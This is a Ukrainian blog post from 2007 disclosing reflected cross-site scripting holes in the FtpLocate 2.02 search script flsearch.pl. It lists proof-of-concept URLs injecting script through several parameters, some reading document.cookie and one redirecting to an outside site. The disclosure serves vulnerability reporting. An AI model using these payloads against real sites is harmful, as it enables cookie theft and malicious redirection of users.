Cross-Site Scripting уразливості в FtpLocate

23:14 01.03.2007

Ще в жовтні минулого року (12.10.2006) я знайшов Cross-Site Scripting уразливості в FtpLocate - це движок пошуку по ftp серверам. Дані уразливості зокрема я знайшов на сайті locate.in.ua (про що я писав), адмінам якого я повідомив.

Уразливим до XSS є версія FtpLocate 2.02 (і можливо попередні).

XSS:

Уразливості в скрипті flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit та sizebytes.

http://site/cgi-bin/ftplocate/flsearch.pl?all=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&query=test
http://site/cgi-bin/ftplocate/flsearch.pl?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E


Leave a Reply

You must be logged in to post a comment.